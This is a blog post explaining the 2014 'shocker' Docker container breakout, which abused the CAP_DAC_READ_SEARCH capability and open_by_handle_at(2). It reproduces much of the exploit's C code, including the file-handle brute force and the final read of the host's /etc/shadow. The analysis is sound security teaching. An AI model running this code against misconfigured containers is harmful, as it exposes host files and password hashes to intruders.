Docker breakout exploit analysis 

a summary and line by line overview

Recently, an interesting Docker exploit was posted (http://stealth.openwall.net/xSports/shocker.c) that demonstrates an information leak where a Docker container can access some privileged filesystem data where it shouldn’t. As I was just discussing the relative merits of using Docker, and how security is often quoted as one of them, I thought it would be interesting to dissect exactly how this exploit works by looking at a bit of the code.

The core problem is misconfigured permissions (CAP_DAC_READ_SEARCH) that are granted to the container process, and illustrates how container-level virtualization can be tricky to configure. To be fair, this isn’t necessarily a Docker specific problem (it could be any misconfigured container), and it should also be pointed out that this was fixed in Docker 1.0.0.

The exploit makes this claim quite cleanly at the top of its file:

 * However
* as its only a bind-mount the fs struct from the task is shared
* with the host which allows to open files by file handles
* (open_by_handle_at()). As we thankfully have dac_override and
* dac_read_search we can do this.

What does this mean? Well, let’s just head to the helpful ol’ man-page (`man 7 capabilities`) to find out.

Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled. 

What this is saying is this: in traditional UNIX, you get root or nothing. With the advent of the 2.2 kernel, we are allowed more fine-grained access control over exactly what a privileged process can do. Which makes sense, and seems generally like a good idea.

The man page goes on to describe each capability, and if we look further at what the capability CAP_DAC_READ_SEARCH allows, we can confirm it grants access to open_by_handle_at(2), a system call that allows us to open a file given its file handle.

 CAP_DAC_READ_SEARCH
* Bypass file read permission checks and directory read and
execute permission checks;
* Invoke open_by_handle_at(2).

If we `man 2 open_by_handle_at`, it all becomes clear.

int open_by_handle_at(int mount_fd, struct file_handle *handle,
int flags);

This system call takes a file descriptor for any open file system descriptor within the mount point of the file in question (mount_fd), a file handle that describes the file we wish to open, and additional flags we want to pass to the process that opens the file.

But Jen, you may be asking, why is this system call even necessary? Why do we need something other than the typical open(2) interface to interact with file descriptors?

It’s a great question, and one that can also be answered by the `open_by_handle_at` man page:

 A file handle can be generated in one process using
name_to_handle_at() and later used in a different process that calls
open_by_handle_at().

So, where file descriptors are unique per process, which means you can’t easily pass them around, the idea is you can pass around these file handles (which represents a structure that describes an open file system entry in the kernel) to other processes. You can probably already imagine why this is a security nightmare in the making, let’s say if one process has a handle open to something like, ‘/etc/shadow’ and another process ISN’T supposed to have access to it, but can somehow call open_by_handle_at(2) on the handle opened by the other process…

Well, you can see where this is going, and it’s not going to be pretty.

If we tie this information to what we know about CAP_DAC_READ_SEARCH back above, we know that CAP_DAC_READ_SEARCH applied to our container not only allows us to traverse the file system without permission checks, but also explicitly removes any checks to open_by_handle_at(2) and could allow our process to sensitive files opened by other processes.

So, without further ado, how does our friend shocker.c accomplish this? Let’s find out.

First, let’s look at the data structure that’s defined at the top of the file, my_file_handle:

https://gist.github.com/jandre/4a8bed58dcb3455cfa85

This is simply an analog to the file_handle stat structure in the Linux kernel, defined here:

783 struct file_handle {
784 __u32 handle_bytes;
785 int handle_type;
786 /* file identifier */
787 unsigned char f_handle[0];
788 };

Presumably the actual file handle value (f_handle) has no size since it depends on the architecture of your system. In a 64-bit system, as described in the exploit, it will be 8 bytes, where the first 4 bytes represent the inode of the path in question. This custom struct will simply be cast as an f_handle path when passed to open_by_handle_at(2) because it is laid out the same in memory.

If we look at the main() function, we can see how the exploit takes advantage of the fact that the root inode (e.g. /) almost always is ‘2', and uses that as a base point to traverse the filesystem:

int main()
{
char buf[0x1000];
int fd1, fd2;
struct my_file_handle h;
struct my_file_handle root_h = {
.handle_bytes = 8,
.handle_type = 1,
.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
};

It then gets a file descriptor (what will be mount_fd in the open_by_handle_at(2) system call) by using a docker file that is commonly mounted:

	// get a FS reference from something mounted in from outside
if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0)
die("[-] open");

The meat of the code is in find_handle, which takes this file descriptor, the file handle of (‘/’), and a variable ‘h’ that will hold the output file handle of file that we are looking to find (in this case, ‘/etc/shadow’).

	if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
die("[-] Cannot find valid handle!");

The core of the logic you can see is in find_handle(), so let’s look there next.

int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh) {

From the definition of find_handle(), you can see it takes a file descriptor for mount_fd, (hello, /.dockerinit!), a path to look for, an input file handle, and an output file handle which our results get copied to.

On a high level, this function does this:

It operates recursively, with two modes:

a) If have not reached the ‘leaf’ (the file itself, which is tested by looking for a ‘/’ in the path), we test to see if we are a directory, and if so, list the contents of the directory.

We use open_by_handle_at(2) to get a file descriptor to the directory, and then see if we can find the match for the parent_directory of path by inode:

if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)	die("[-] open_by_handle_at");

if ((dir = fdopendir(fd)) == NULL)
die("[-] fdopendir");

for (;;) {
de = readdir(dir);
if (!de)
break;
fprintf(stderr, "[*] Found %s\n", de->d_name);
if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
ino = de->d_ino;
break;
}
}

Once the inode is found, we brute force the remaining 32 bits in file_handle to get the handle we are looking for (remember, the inode comprises the first 32 bits), then we call find_handle() again:

if (de) {
for (uint32_t i = 0; i < 0xffffffff; ++i) {
outh.handle_bytes = 8;
outh.handle_type = 1;
memcpy(outh.f_handle, &ino, sizeof(ino));
memcpy(outh.f_handle + 4, &i, sizeof(i));

if ((i % (1<<20)) == 0)
fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
closedir(dir);
close(fd);
dump_handle(&outh);
return find_handle(bfd, path, &outh, oh);
}
}
}

b) if we’ve reached a leaf node (which is checked by seeing if there are any more slashes), then we simply copy the input file handle to the output file handle, and return that match!

if (!path) {
memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
oh->handle_type = 1;
oh->handle_bytes = 8;
return 1;
}

Once the find_handle() function returns (successfully!) then we simply call open_by_handle_at(2) on the returned file descriptor, and call read() to read the data on the file descriptor returned:

fprintf(stderr, "[!] Got a final handle!\n");
dump_handle(&h);

if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
die("[-] open_by_handle");

memset(buf, 0, sizeof(buf));
if (read(fd2, buf, sizeof(buf) - 1) < 0)
die("[-] read");

fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);

So how was this vulnerability introduced? The Docker folks have released a helpful post-mortem:

In earlier Docker Engine releases (pre-Docker Engine 0.12) we dropped a specific list of kernel capabilities, ( a list which did not include this capability), and all other kernel capabilities were available to Docker containers. In Docker Engine 0.12 (and continuing in Docker Engine 1.0) we drop all kernel capabilities by default. Essentially, this changes our use of kernel capabilities from a blacklist to a whitelist.

Basically this means that CAP_DAC_READ_SEARCH was previously a capability they had forgotten to add to their blacklist by default, and no longer applies since now you have to explicitly define which permissions you want your containers to have since Docker 1.0.0. Yay!

The lesson to be learned is that sandboxing things, especially sandboxing apps that need some level of root privileges or access, is not easy.


Further reading:

To read more about the various container-level privileges that are configurable in the kernel, you can man 7 capabilities (http://man7.org/linux/man-pages/man7/capabilities.7.html)).

Postmortem from the docker folks: http://blog.docker.com/2014/06/docker-container-breakout-proof-of-concept-exploit/


like this kind of stuff? come work @threatstack — https://www.threatstack.com

Show your support

Clapping shows how much you appreciated Jen Andre’s story.